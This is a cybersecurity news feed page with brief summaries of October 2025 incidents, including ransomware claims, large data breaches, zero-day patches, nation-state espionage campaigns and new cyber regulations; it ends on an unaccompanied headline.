Russia's federal agency for veterinary and phytosanitary surveillance, Rosselkhoznadzor, has been targeted by a large-scale distributed denial-of-service (DDoS) attack starting October 22, 2025. The attack crippled the agency's critical electronic certification systems, including the 'Mercury' platform, which is essential for tracking animal products. The outage caused significant delays in food shipments from major producers of meat, milk, and baby food across the nation, highlighting the vulnerability of critical national infrastructure to cyberattacks. Russian telecom providers are working to mitigate the attack, for which no group has claimed responsibility.

Oct 26, 20254 min read

Safepay Ransomware Hits German Surveillance Firm Xortec, Sparking Supply Chain Fears

The Safepay ransomware group has claimed responsibility for a cyberattack against Xortec GmbH, a German provider of professional video surveillance solutions. The group has listed Xortec on its data leak site with a payment deadline of October 27, 2025. This attack raises significant supply chain concerns, as a compromise of a value-added distributor like Xortec could potentially lead to backdoored hardware or software being deployed in sensitive client environments. Safepay is a relatively new but aggressive ransomware-as-a-service (RaaS) operation known for its rapid double-extortion attacks.

Oct 26, 20255 min read

Google Issues Emergency Patch for Critical Chrome RCE Flaw Found by AI

Google has released an emergency security update for the Chrome browser, addressing a critical remote code execution (RCE) vulnerability in its V8 JavaScript engine. The flaw, tracked as CVE-2025-12036, was discovered by Google's internal AI-driven research project, 'Big Sleep.' Successful exploitation could allow an attacker to execute arbitrary code on a user's system by tricking them into visiting a malicious website. The patch has been rolled out for Windows, macOS, and Linux users, who are urged to update their browsers immediately to mitigate the high-severity threat.

Oct 25, 20254 min read

Nation-State and Financial Cybercrime Blur as Industrial Sector Becomes Top Target

A new report from Trellix reveals a significant convergence between the tactics of nation-state actors and financially motivated cybercriminals, with both increasingly leveraging AI-powered tools. The industrial sector has emerged as the most targeted industry, accounting for over 36% of attacks analyzed between April and September 2025. The research highlights the dominance of PowerShell as a key attack tool, used in nearly 78% of ransomware campaigns. The United States remains the most targeted nation, and the ransomware landscape is highly fragmented, with the top five groups accounting for less than 40% of all incidents.

Oct 25, 20255 min read

India Enacts New Telecom Cybersecurity Rules for IMEI and Mobile Number Validation

India's Ministry of Communications has enacted new cybersecurity regulations for its telecommunications sector, effective October 22, 2025. The 'Telecommunications (Telecom Cyber Security) Amendment Rules, 2025' introduce two key measures: the establishment of a centralized Mobile Number Validation (MNV) platform to secure digital communications, and stricter controls on International Mobile Equipment Identity (IMEI) numbers. The new IMEI rules prohibit the assignment of already-used IMEIs to new devices and mandate that sellers and buyers of used devices verify the IMEI against a national database to combat theft and tampering.

Oct 25, 20254 min read

UN Convention Against Cybercrime Signed in Hanoi Amid Global Endorsement and Controversy

In a landmark event in Hanoi, Vietnam, representatives from nearly 100 UN member states have signed the United Nations Convention against Cybercrime. Adopted by the UN General Assembly in December 2024, this treaty, also known as the Hanoi Convention, establishes the first global legal framework for international cooperation in combating a wide array of online crimes, including fraud, child exploitation, and money laundering. While hailed as a milestone by the UN Secretary-General, the event drew criticism from rights groups over the choice of Vietnam as the host, and a major tech industry group, the Cybersecurity Tech Accord, declined to attend.

Oct 25, 20254 min read

EU Accuses Meta and TikTok of Breaching Digital Services Act Transparency Rules

The European Commission has issued preliminary findings that Meta's platforms (Facebook and Instagram) and TikTok have breached their obligations under the Digital Services Act (DSA). The Commission alleges the companies failed to provide adequate access to public data for researchers, hindering independent scrutiny of their platforms. Furthermore, Meta is accused of using 'dark patterns' and creating a burdensome process for users to report illegal content. These are initial findings, and both companies will have the opportunity to respond and propose remedies before any final decision or penalties are imposed.

Oct 25, 20254 min read

Ransomware Attacks on Critical Industries Skyrocket by 34%, KELA Reports

A new report from cyber intelligence firm KELA reveals a staggering 34% year-over-year increase in ransomware attacks targeting critical industries between January and September 2025. These vital sectors, including manufacturing, healthcare, and energy, accounted for half of all 4,701 recorded global incidents. The United States was the most heavily targeted nation. The report also highlights the consolidation of the ransomware ecosystem, with just five groups—Qilin, Clop, Akira, Play, and SafePay—responsible for nearly a quarter of all attacks.

Oct 25, 20255 min read

Patch Now: Microsoft Fixes 170+ Flaws, Including Four Actively Exploited Zero-Days

Microsoft has released its October 2025 Patch Tuesday update, a massive release fixing over 170 security vulnerabilities across its product ecosystem. The update is critical for all users, as it contains patches for four zero-day vulnerabilities that are being actively exploited in the wild. Two of these flaws, CVE-2025-24990 and CVE-2025-59230, allow for local privilege escalation to Administrator or SYSTEM rights. CISA has added the exploited vulnerabilities to its KEV catalog, mandating urgent patching for federal agencies.

Oct 25, 20255 min read

UK Gov & NCSC Issue Urgent Warning to FTSE 350 Boards on Cyber Resilience

The UK's National Cyber Security Centre (NCSC) and government ministers have sent a formal letter to the leaders of all FTSE 350 companies, demanding that cyber resilience be treated as a top board-level priority. The call to action follows the NCSC's latest annual review, which revealed a 50% increase in significant cyber incidents. The letter outlines three practical steps: adopt the government's Cyber Governance Code, enroll in the NCSC's Early Warning service, and mandate Cyber Essentials certification throughout supply chains.

Oct 24, 20255 min read

Google Patches 6th Actively Exploited Chrome Zero-Day of 2025

Google has issued an emergency security update for its Chrome web browser to address CVE-2025-10585, a high-severity type confusion vulnerability in the V8 JavaScript engine. This marks the sixth time in 2025 that Google has patched a Chrome zero-day vulnerability that was being actively exploited in the wild. The flaw could allow an attacker to achieve arbitrary code execution on a victim's machine by tricking them into visiting a malicious website. All users of Chrome and other Chromium-based browsers are urged to update immediately.

Oct 24, 20255 min read

Agenda Ransomware Evolves, Hits Critical Infrastructure

The Agenda ransomware group, also known as Qilin, is escalating its attacks by targeting critical infrastructure sectors with evolved tactics. According to research from Trend Micro, the ransomware-as-a-service (RaaS) operation is using a cross-platform approach, abusing legitimate remote management tools and deploying Linux-based ransomware on Windows hosts to evade security. The group also employs Bring Your Own Vulnerable Driver (BYOVD) attacks to neutralize endpoint defenses and steals backup credentials to hinder recovery, primarily targeting high-value organizations in the U.S., Canada, and the U.K.

Oct 24, 20255 min read

Tengu Ransomware Hits Brazilian Education Provider

The Tengu ransomware group has claimed responsibility for a cyberattack against UniCursos, a prominent education provider in Brazil. The attack, which was posted to the group's leak site on October 23, 2025, follows the common double-extortion model, where the attackers threaten to publish sensitive stolen data if their ransom demands are not met. The incident highlights the continued targeting of the education sector by ransomware gangs, who view them as valuable targets due to the sensitive student and staff data they hold.

Oct 24, 20254 min read

Ransomware Hits Jewett-Cameron, Steals Financial Data

Jewett-Cameron, an Oregon-based manufacturing and distribution company, has confirmed in an SEC filing that it suffered a ransomware attack on October 15, 2025. The attack caused significant disruption to its business operations and resulted in the theft of sensitive corporate data. The exfiltrated information reportedly includes IT and financial data being prepared for the company's upcoming Form 10-K filing, as well as screen captures from video meetings. The unidentified attackers have demanded a ransom and threatened to leak the stolen material.

Oct 24, 20254 min read

Lawsuit Hits SC School District After Ransomware Breach

South Carolina's Lexington-Richland School District 5 (LR5) is facing a class-action lawsuit following a ransomware attack in June 2025 that exposed the personally identifiable information (PII) of over 31,000 students, staff, and alumni. The lawsuit alleges that the school district was negligent in protecting sensitive data and violated state law by failing to provide timely and complete notification of the breach. The compromised data included names, birthdates, Social Security numbers, and financial files, making it one of the most significant breaches for an educational institution in the region.

Oct 24, 20254 min read

Lazarus Group's 'Operation DreamJob' Targets EU Drone-Makers

The notorious North Korea-linked APT group, Lazarus, is conducting a cyber-espionage campaign dubbed 'Operation DreamJob' targeting European defense and aerospace companies. The campaign specifically focuses on firms involved in Unmanned Aerial Vehicle (UAV) technology. The attackers use sophisticated social engineering, creating fake recruiter profiles and job offers to lure employees. The ultimate goal is to compromise the target's network to steal sensitive intellectual property related to advanced drone technology.

Oct 24, 20255 min read

Iran's MuddyWater APT Targets 100+ Governments with Phoenix Backdoor

The Iranian state-sponsored threat group MuddyWater is conducting a large-scale cyber-espionage campaign targeting over 100 government entities, primarily in the Middle East and North Africa (MENA). According to Group-IB, the attackers are using phishing emails sent from a compromised mailbox, leveraging the NordVPN service for anonymity. The emails contain malicious Word documents that use macros to deploy version 4 of the 'Phoenix' backdoor, a payload designed for foreign intelligence gathering. The campaign highlights the group's return to classic macro-based attack vectors.

Oct 23, 20256 min read

Unit 42 Exposes 'Smishing Deluge' from China and 'Jingle Thief' Gift Card Fraud

Researchers at Palo Alto Networks' Unit 42 have detailed two distinct and significant cybercrime operations. The first, a massive smishing campaign dubbed 'The Smishing Deluge,' is attributed to a China-based threat actor and is flooding mobile users globally with malicious SMS messages. The second campaign, named 'Jingle Thief,' is a sophisticated cloud-based operation focused on automating the theft and monetization of gift cards. These findings, highlighted in Unit 42's October Threat Bulletin, showcase the diverse tactics of modern criminals, from large-scale social engineering to highly targeted financial fraud.

Oct 23, 20255 min read

Critical RCE Flaw in WSUS Allows Unauthenticated SYSTEM Takeover

A critical remote code execution (RCE) vulnerability, CVE-2025-59287, with a CVSS score of 9.8, has been discovered in Microsoft's Windows Server Update Services (WSUS). The flaw allows an unauthenticated attacker on the same network to gain SYSTEM-level privileges on a vulnerable server by sending a maliciously crafted cookie. The vulnerability stems from an unsafe deserialization process. While not yet exploited in the wild, Microsoft rates exploitation as "more likely." Given that compromising WSUS could enable an attacker to distribute malicious updates across an entire enterprise, immediate patching is strongly advised.

Oct 23, 20254 min read

Massive Prosper Data Breach Exposes Social Security Numbers of 17.6 Million Users

The peer-to-peer lending platform Prosper has confirmed a catastrophic data breach compromising the sensitive personally identifiable information (PII) of approximately 17.6 million people. The exposed data includes full names, physical addresses, IP addresses, income levels, and, most critically, Social Security numbers. The breach, first detected in September 2025, places millions of individuals at severe risk of identity theft and sophisticated financial fraud.

Oct 23, 20257 min read

NY Regulator Puts Financial Firms on Notice: You Are Accountable for Your Vendors' Security

The New York State Department of Financial Services (DFS) has issued new guidance for financial institutions, emphasizing their ultimate accountability for managing cybersecurity risks originating from third-party service providers (TPSPs). The regulator warned that as firms increasingly rely on cloud computing, AI, and fintech solutions from vendors, their exposure to threats grows. The guidance explicitly states that boards of directors and senior officers must possess sufficient cybersecurity knowledge to oversee and challenge management's third-party risk strategies. DFS Acting Superintendent Kaitlin Asrow stressed that regulated entities cannot outsource their responsibility for protecting consumer data and ensuring operational security.

Oct 23, 20255 min read

Healthcare Breaches Seem to Drop, But Government Shutdown Hides True Numbers

Official data for September 2025 shows only 26 major healthcare data breaches, the lowest monthly total since 2018. However, The HIPAA Journal cautions that this apparent decline is misleading. A US government shutdown has largely halted the HHS's Office for Civil Rights (OCR) from processing and updating its public breach portal. The 26 reported breaches affected over 1.29 million individuals, with hacking incidents accounting for 98.8% of the exposed records. Experts believe the true number of breaches for September is significantly higher and will be reflected in a surge of reports once the OCR resumes normal operations.

Oct 23, 20255 min read

Palomar Health Breach Exposes Highly Sensitive Patient Data, Including Biometrics

Palomar Health Medical Group (PHMG), a California-based healthcare provider, has announced it was the victim of a cybersecurity incident that exposed sensitive patient data. The compromised information includes not only names and personal identifiers but also highly sensitive data types such as biometric data, U.S. alien registration numbers, and financial account information. The full scope of the breach, including the number of affected patients, has not yet been disclosed. The national class action law firm Lynch Carpenter is now investigating claims against PHMG, signaling significant legal and financial fallout for the provider.

Oct 23, 20255 min read

CrowdStrike: 76% of Organizations Can't Keep Pace with AI-Powered Ransomware

According to CrowdStrike's '2025 State of Ransomware Survey,' a staggering 76% of global organizations feel their defensive capabilities cannot match the speed and sophistication of AI-powered cyberattacks. Adversaries are now weaponizing artificial intelligence to accelerate every stage of the ransomware attack chain, from malware creation to social engineering, rendering legacy detection methods obsolete. Nearly half of organizations now view AI-automated attacks as their single greatest ransomware threat.

Oct 23, 20255 min read

UK's NCSC Warns of Doubling 'Nationally Significant' Cyberattacks, Cites Supply Chain Risk

The UK's National Cyber Security Centre (NCSC) has reported a sharp increase in cyberattacks, with 'nationally significant' cases more than doubling in the past year. In response, the NCSC is urging organizations to bolster their incident preparedness. Experts are pointing to vulnerabilities within the digital supply chain as a primary entry point for these attacks, with service providers like helpdesks becoming gateways to core business systems. A recent survey found that nearly a third of UK procurement managers reported a supply chain partner had been attacked in recent months.

Oct 22, 20254 min read

Critical Netty Zero-Day Bypasses All Major Email Authentication

A critical zero-day vulnerability, CVE-2025-59419, has been discovered in the widely used Netty Java library, affecting countless applications that handle email. The flaw allows an unauthenticated attacker to perform SMTP injection by embedding carriage return and line feed characters into email commands. This enables them to bypass standard email authentication defenses like SPF, DKIM, and DMARC, making it possible to send highly convincing spoofed emails that appear to originate from trusted domains. A patch is available and should be applied immediately.

Oct 22, 20256 min read

Patch Now: Critical RCE Flaws in Oracle E-Business Suite Marketing Module

Oracle has issued urgent patches for two critical, unauthenticated remote code execution (RCE) vulnerabilities in its E-Business Suite. The flaws, CVE-2025-53072 and CVE-2025-62481, both carry a CVSS score of 9.8 and affect the Oracle Marketing module. An attacker with network access can exploit these vulnerabilities via a simple HTTP request, without any user interaction, to achieve a full takeover of the marketing component. Oracle urges customers using affected versions (12.2.3 through 12.2.14) to apply the October 2025 Critical Patch Update immediately.

Oct 22, 20255 min read

DHS Breach: 'CitrixBleed 2.0' Zero-Day Exposes FEMA & CBP Employee Data

A critical zero-day vulnerability in Citrix NetScaler Gateway, dubbed 'CitrixBleed 2.0' (CVE-2025-5777), was exploited to breach the U.S. Department of Homeland Security. The attack, which began in June 2025, compromised the personal and employment data of staff at the Federal Emergency Management Agency (FEMA) and U.S. Customs and Border Protection (CBP). The threat actor gained initial access through FEMA's Region 6 network and moved laterally, leading to significant federal scrutiny and subsequent staff dismissals.

Oct 21, 20255 min read

Chinese APT Salt Typhoon Targets European Telecom with SNAPPYBEE Backdoor

The Chinese state-sponsored group Salt Typhoon has been observed targeting a European telecommunications firm by exploiting a known Citrix NetScaler vulnerability for initial access. Post-exploitation, the attackers deployed a backdoor known as SNAPPYBEE (or Deed RAT) using DLL side-loading techniques, hiding the malicious payload alongside legitimate antivirus executables to evade detection. The attack, which was part of a broader cyber-espionage campaign, was detected in its early stages by Darktrace before significant data exfiltration occurred.

Oct 21, 20255 min read

'GlassWorm' Worm Uses Unicode Obfuscation and Solana C2 in VS Code Supply Chain Attack

A highly sophisticated, self-propagating worm named 'GlassWorm' is targeting Visual Studio developers through malicious extensions on the OpenVSX marketplace. The malware employs advanced evasion techniques, including using invisible Unicode characters to obfuscate its code and leveraging the Solana blockchain for a resilient command-and-control (C2) infrastructure. The worm is designed to steal NPM, GitHub, and Git credentials, as well as drain cryptocurrency from 49 different wallet extensions.

Oct 21, 20255 min read

Russian APT COLDRIVER Rapidly Deploys New NOROBOT Malware After Public Disclosure

The Russian state-sponsored threat group COLDRIVER, also known as Star Blizzard and UNC4057, has demonstrated remarkable operational agility by deploying new malware families just five days after its LOSTKEYS malware was publicly disclosed in May 2025. According to Google's Threat Intelligence Group (GTIG), the group has ceased using LOSTKEYS and is now actively using a new toolset, including the NOROBOT DLL and a PowerShell backdoor called MAYBEROBOT, to target high-value individuals such as NGOs, policy advisors, and dissidents.

Oct 21, 20255 min read

UK Regulators Issue Cyber Recovery Guide for Financial Firms

The United Kingdom's top financial regulators—the Bank of England (BoE), the Financial Conduct Authority (FCA), and the Prudential Regulation Authority (PRA)—have jointly published a guide on effective cyber response and recovery practices. The guidance, aimed at all financial firms, emphasizes the critical need for the ability to recover from severe attacks by using immutable backups, maintaining segregated recovery environments, and conducting rigorous testing of both internal and third-party resilience.

Oct 21, 20254 min read

EU Launches Cybersecurity Reserve to Bolster Incident Response Across Member States

The European Union has officially established the European Cybersecurity Reserve as a key component of its Cyber Solidarity Act. Managed by the EU Agency for Cybersecurity (ENISA), the reserve has a €36 million budget and consists of 45 pre-vetted, trusted private providers, such as Airbus Protect and Spike Reply. This 'cyber reinforcement team' is designed to be deployed to assist EU member states and institutions during large-scale cyber incidents affecting critical infrastructure.

Oct 21, 20253 min read

'Cavalry Werewolf' APT Targets Russian Critical Infrastructure with Custom Malware

The Advanced Persistent Threat (APT) group known as Cavalry Werewolf (also tracked as YoroTrooper and Silent Lynx) conducted a targeted cyberattack campaign against Russia's public sector and critical industries between May and August 2025. The group leveraged spear-phishing emails to deliver custom malware, including FoalShell and StallionRAT. Post-compromise activities focused on reconnaissance and establishing persistence via Windows Registry modifications, while using SOCKS5 proxies for command-and-control and data exfiltration.

Oct 21, 20255 min read

CISA Mandates Patching for 5 New Actively Exploited Flaws in Apple, Microsoft, Oracle, and Kentico

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The flaws affect a range of widely used products, including Apple devices, Kentico Xperience, Microsoft Windows SMB Client, and Oracle E-Business Suite. Federal agencies are now mandated to apply patches by a specified deadline, and CISA strongly urges all organizations to prioritize remediation to mitigate significant cyber risk.

Oct 20, 20258 min read

Anubis Ransomware Hits Australian Engineering Firm Aussie Fluid Power

The Australian industrial engineering company, Aussie Fluid Power, has confirmed it was hit by a ransomware attack claimed by the emerging 'Anubis' ransomware group. The incident, which has impacted company operations and stakeholder data, aligns with warnings from the Australian Cyber Security Centre (ACSC) about increasing cyber threats to critical infrastructure and the industrial sector. This attack underscores the growing risk posed by new ransomware gangs targeting operational technology (OT) environments.

Oct 20, 20257 min read

EU and Ukraine Deepen Cyber Defense Alliance in Face of Russian Aggression

The European Union and Ukraine have reaffirmed their strategic partnership on cybersecurity during their 4th Cyber Dialogue held in Kyiv. Against the backdrop of Russia's ongoing war, both parties committed to deepening cooperation on cyber defense, policy alignment with EU standards like the NIS2 Directive, and the protection of critical infrastructure. Ukraine will continue to share threat intelligence gained from defending against Russian cyberattacks to bolster the EU's collective security.

Oct 20, 20255 min read

Lending Platform Prosper Breached, 17.6 Million Accounts Exposed

The peer-to-peer lending platform Prosper has confirmed a massive data breach that exposed the personal and sensitive information of approximately 17.6 million user accounts. The breach notification service 'Have I Been Pwned' has already incorporated the data set, which includes names, email addresses, and phone numbers. The incident places millions of users at a significantly higher risk of targeted phishing campaigns, identity theft, and other fraudulent activities. Affected users are strongly advised to change their passwords and enable multi-factor authentication immediately.

Oct 20, 20254 min read

Clop Ransomware Claims Harvard University Breach, Threatens Data Leak

The prolific Russian-speaking ransomware group Clop has claimed responsibility for a cyberattack against Harvard University, adding the prestigious institution to its data leak site on October 12, 2025. The group, known for its 'big-game hunting' and exploitation of zero-day vulnerabilities, threatened to publish stolen data, stating that a torrent link would be available soon. The claim has not yet been confirmed by Harvard. Clop, also known as TA505, has a history of high-profile attacks using double-extortion tactics, including the mass exploitation of flaws in MOVEit Transfer and GoAnywhere MFT, which affected hundreds of organizations worldwide.

Oct 19, 20255 min read

F5 Breached by Nation-State Actor; BIG-IP Source Code Stolen, CISA Issues Emergency Directive

Application security vendor F5 has disclosed a major security breach attributed to a 'highly sophisticated nation-state threat actor.' The attackers maintained long-term access to F5's internal development environments, exfiltrating portions of the BIG-IP source code, information on undisclosed vulnerabilities, and some customer configuration data. While F5 states there is no evidence of software supply chain modification, the incident poses a significant future risk. In response, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Emergency Directive 26-01, mandating all federal civilian agencies to immediately patch F5 products, inventory devices, and remove end-of-life systems from their networks.

Oct 19, 20255 min read

Massive Airline Data Breach Hits 13 Million Vietnam Airlines and Qantas Customers

A major data breach originating from a third-party service provider has compromised the personal information of approximately 13 million customers of Vietnam Airlines and Qantas. A group calling itself 'Scattered LAPSUS$ Hunters' claims to have stolen the data in June by breaching the Salesforce accounts of a technology partner used by the airlines. The leaked data includes full names, dates of birth, email addresses, phone numbers, and loyalty program details. Both airlines have confirmed the breach and are urging customers to change their passwords.

Oct 19, 20255 min read

"SIMCARTEL" CaaS Network Busted in Major European Takedown

A coordinated international law enforcement operation codenamed "SIMCARTEL" has dismantled a massive Cybercrime-as-a-Service (CaaS) platform operating out of Latvia. The operation, involving authorities from Austria, Estonia, and Finland with support from Europol, resulted in seven arrests and the seizure of a vast infrastructure that enabled millions of euros in financial fraud. The network provided criminals with access to over 40,000 active SIM cards via SIM box devices, which were used to create approximately 49 million fraudulent online accounts, facilitating crimes like phishing, smishing, and investment fraud across Europe.

Oct 19, 20255 min read

Silver Fox APT Expands Reach, Targets Japan and Malaysia with New RAT

The Chinese-nexus cybercrime group known as "Silver Fox" has expanded its targeting beyond China and Taiwan to include organizations in Japan and Malaysia. Researchers report the group is using phishing emails with malicious PDFs to distribute the HoldingHands RAT. This expansion follows previous campaigns where the group used diverse tactics, including SEO poisoning to spread the Winos 4.0 (ValleyRAT) malware and Bring Your Own Vulnerable Driver (BYOVD) attacks to disable security software. The group's evolving tactics and widening geographic scope indicate an increased threat to government and commercial entities across Asia.

Oct 19, 20255 min read

Panera Bread Reaches $2.5M Settlement for 2024 Data Breach

Panera Bread has agreed to a $2.5 million settlement to resolve a class-action lawsuit related to a data breach that occurred in March 2024. The breach exposed the personal information, including names and Social Security numbers, of approximately 147,321 individuals, primarily current and former employees. Under the settlement, affected individuals can file claims for reimbursement of expenses and time spent dealing with the breach's aftermath, with a claim deadline of November 11, 2025.

Oct 19, 20254 min read

Volkswagen Probes 8Base Ransomware Attack Claim

The Volkswagen Group is investigating a claim from the 8Base ransomware group that it has breached the automotive giant and stolen sensitive data. 8Base, a data extortion group linked to Phobos ransomware, posted a trove of allegedly stolen files on its dark web site, including accounting documents and employee contracts. Volkswagen stated its core IT systems are secure but acknowledged the possibility of a breach through a third-party supplier, highlighting the growing threat of supply chain attacks. The incident places Volkswagen under potential GDPR scrutiny.

Oct 19, 20255 min read

'Mysterious Elephant' APT Evolves, Deploys Custom Tools in Espionage Campaign

The cyber-espionage group known as 'Mysterious Elephant' has demonstrated a significant evolution in its capabilities, moving away from recycled malware to deploying its own custom-developed tools. Since early 2025, the APT group has been targeting government and diplomatic entities in South Asia. This strategic shift indicates an increased level of sophistication and investment, allowing the group to create more effective and evasive malware for its intelligence-gathering operations. The campaign poses a notable threat to the targeted governments and may have indirect implications for European nations with interests in the region.

Oct 18, 20255 min read

Microsoft Patches 172 Flaws, Including Three Actively Exploited Zero-Days

Microsoft's October 2025 Patch Tuesday update is one of the largest of the year, addressing over 172 vulnerabilities across its product suite. The release is critically important as it includes patches for three zero-day vulnerabilities under active attack. These include an elevation of privilege flaw in the Windows Remote Access Connection Manager (CVE-2025-59230), which has been added to CISA's KEV catalog. Additionally, a highly critical, pre-authentication remote code execution vulnerability (CVE-2025-59287) in the Windows Server Update Service (WSUS) with a 9.8 CVSS score requires immediate attention. The update also marks the final security patch for most versions of Windows 10, pushing organizations towards migration.

Oct 18, 20255 min read

Cisco Zero-Day Flaw Actively Exploited to Implant Linux Rootkits on Network Switches

A critical zero-day vulnerability in Cisco IOS and IOS XE software, tracked as CVE-2025-20352, has been actively exploited in the wild to install Linux rootkits on network devices. The campaign, dubbed 'ZeroDisco' by Trend Micro, targeted Cisco 9400, 9300, and 3750G series switches. The attackers leveraged the SNMP stack overflow flaw for remote code execution after obtaining high-privilege credentials, implanting a fileless rootkit that could evade detection by disappearing after a reboot. Cisco has released patches and urges customers to update affected devices immediately.

Oct 18, 20255 min read

Deloitte to Pay $6.3M in Settlement for Rhode Island Data Breach Affecting 640,000

Deloitte has agreed to a proposed $6.3 million class-action settlement related to a 2024 cyberattack that compromised the personal data of 640,000 Rhode Island residents—nearly half the state's population. The breach affected the state's 'RIBridges' social services system, which was managed by Deloitte. The incident resulted in significant disruption to state government services and the eventual leak of some compromised data on the dark web. This settlement is in addition to a previous $5 million payment Deloitte made to the state to cover breach-related expenses.

Oct 18, 20254 min read

New 'CAPI Backdoor' Malware Targets Russian Auto and E-Commerce Firms

A new cyberespionage campaign is targeting the Russian automobile and e-commerce sectors using a previously undocumented .NET malware known as 'CAPI Backdoor'. According to researchers at Seqrite Labs, the attack is initiated through phishing emails containing a ZIP archive with a malicious LNK file. The malware uses a living-off-the-land technique, executing via 'rundll32.exe', and establishes persistence through scheduled tasks and startup folder entries. CAPI Backdoor is designed to gather system information, check for antivirus products, and exfiltrate data to a C2 server.

Oct 18, 20254 min read

Everest Ransomware Claims Collins Aerospace Hack; Leak Site Mysteriously Goes Offline

The Everest ransomware group has claimed responsibility for the September 2025 cyberattack on Collins Aerospace, a major aviation and defense contractor. The attack caused widespread disruption, affecting check-in and boarding systems at major European airports like Heathrow and Brussels. Shortly after posting the claim on its dark web data leak site, the site became inaccessible, displaying a "Fatal error" message. This has fueled speculation about a potential law enforcement takedown or internal disruption within the ransomware group.

Oct 18, 20254 min read

Massive Supply Chain Risk Found in VSCode Marketplace; 100+ Extensions Leaked Access Tokens

Researchers at Wiz have discovered a significant supply chain risk in the popular VSCode and OpenVSX extension marketplaces. They found that publishers of over 100 extensions had inadvertently leaked their access tokens, which could have allowed attackers to hijack the extensions and distribute malware to more than 150,000 users. The research also uncovered over 550 exposed secrets within 500+ extensions, providing access to developer accounts on services like AWS, GitHub, and OpenAI, further highlighting the pervasive security risks in the software development ecosystem.

Oct 18, 20254 min read

UK's NCSC Warns of 'Alarming' Rise in Cyberattacks, Doubling in Past Year

The UK's National Cyber Security Centre (NCSC) revealed in its 2025 annual review that it managed 204 "nationally significant" cyberattacks over the past year, more than double the 89 incidents from the previous year. The agency attributed the alarming surge to increasing threats from state-sponsored actors, particularly Russia and China, as well as the proliferation of sophisticated ransomware gangs. The NCSC has urged UK businesses to treat cybersecurity as a matter of survival and to elevate cyber resilience to a board-level responsibility to combat the growing threat.

Oct 18, 20254 min read

Ransomware Attacks Surge 36% in Q3 2025, Data Stolen in 96% of Cases

A new report from cybersecurity firm BlackFog reveals that publicly disclosed ransomware attacks surged by 36% year-over-year in the third quarter of 2025, setting a new record. The analysis highlights the near-universal adoption of double-extortion tactics, with data exfiltration occurring in 96% of all incidents. The Qilin ransomware group was identified as the most active publicly attributed gang. Healthcare remained the most targeted public sector, while manufacturing was the hardest-hit sector in non-disclosed attacks, underscoring the pervasive and growing threat of ransomware across all industries.

Oct 18, 20254 min read

CISA Warns: Critical Adobe AEM Flaw (CVSS 10.0) Actively Exploited

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning for a critical remote code execution (RCE) vulnerability in Adobe Experience Manager (AEM) Forms, tracked as CVE-2025-54253. The flaw, which carries a perfect 10.0 CVSS score, allows for unauthenticated arbitrary code execution and is being actively exploited in the wild. CISA has added it to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by November 5, 2025. The vulnerability stems from a misconfiguration in JEE versions of AEM that exposes a debug servlet, allowing attackers to achieve full system compromise.

Oct 17, 20254 min read

UK Fines Capita £14M for "Preventable" 2023 Data Breach

The UK's Information Commissioner's Office (ICO) has levied a £14 million fine against outsourcing giant Capita for significant data protection failures related to a March 2023 data breach that impacted 6.6 million people. The ICO's investigation concluded the breach was 'preventable' and heavily criticized Capita's slow incident response, noting that a compromised device remained active on the network for 58 hours after detection, allowing for further exploitation. The penalty highlights the increasing regulatory focus on the speed and efficacy of breach containment.

Oct 17, 20254 min read

CISA Issues 13 Advisories for Critical ICS/OT Vulnerabilities

On October 16, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a significant batch of thirteen advisories for vulnerabilities affecting Industrial Control Systems (ICS). These alerts impact widely used Operational Technology (OT) products from major vendors including Rockwell Automation, Siemens, Hitachi Energy, Schneider Electric, and Delta Electronics. The flaws pose a direct risk to critical infrastructure sectors such as manufacturing and energy. CISA is urging all asset owners and operators to review the advisories and implement the recommended mitigations immediately.

Oct 17, 20254 min read

California Enacts Stricter Data Breach Law with 30-Day Notification Deadline

California has enacted Senate Bill 446, a new law that significantly shortens the data breach notification timeline for businesses. Organizations must now inform affected California residents of a data breach involving unencrypted personal information within 30 calendar days of its discovery. This amendment to the state's already stringent privacy laws places increased pressure on companies to have highly efficient incident detection and response processes in place to meet the accelerated deadline.

Oct 17, 20254 min read

Ransomware Attacks Surge by 46% as Threat Actors Target Construction and Manufacturing

Despite a slight decrease in overall weekly cyber attacks, ransomware activity has surged by 46%, according to a new report from Check Point Research. This indicates a strategic shift by threat actors towards more focused and impactful ransomware campaigns. The construction, business services, and industrial manufacturing sectors have been the most victimized, bearing the brunt of this new wave. The report identifies the Qilin ransomware-as-a-service (RaaS) group as one of the most prominent actors, responsible for 14.1% of publicly disclosed victims. The findings highlight an urgent need for organizations, especially in the industrial and business services sectors, to bolster their defenses against an increasingly targeted ransomware threat.

Oct 17, 20254 min read

Akira Ransomware Gang Actively Exploiting SonicWall VPNs for Network Breaches

The Akira ransomware group is actively exploiting vulnerabilities in SonicWall SSL VPN devices to gain initial access to corporate networks. By targeting these widely used, internet-facing appliances, the threat actors can establish a foothold, move laterally, exfiltrate sensitive data, and ultimately deploy the Akira ransomware payload. This campaign underscores the critical importance of promptly patching edge devices and enforcing multi-factor authentication for all remote access solutions to defend against sophisticated ransomware attacks.

Oct 16, 20256 min read

CISA Orders Urgent Patching After Chinese Hackers Steal F5 Source Code

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Emergency Directive 26-01, ordering federal agencies to take immediate action after F5 disclosed a severe breach by a sophisticated nation-state actor, reportedly linked to China. The attackers maintained access for at least a year, exfiltrating proprietary source code for F5 BIG-IP products and details of unpatched vulnerabilities. This breach poses an imminent supply chain risk, as the stolen data could allow adversaries to craft powerful zero-day exploits against F5 customers worldwide, including government and critical infrastructure.

Oct 16, 20256 min read

Microsoft Thwarts Ransomware Campaign by Revoking 200+ Malicious Code-Signing Certificates

Microsoft has taken decisive action to disrupt a ransomware campaign by the threat group Vanilla Tempest (also known as Vice Society), which has been targeting education and healthcare. The group was using over 200 fraudulently obtained code-signing certificates to sign counterfeit Microsoft Teams installers. These fake installers delivered the Oyster backdoor, which in turn deployed the Rhysida ransomware. By revoking the certificates from providers like DigiCert, SSL.com, and its own Trusted Signing service, Microsoft has significantly hindered the malware's ability to evade detection.

Oct 16, 20255 min read

Full Industrial Control: Two CVSS 10.0 Flaws Found in Red Lion ICS RTUs

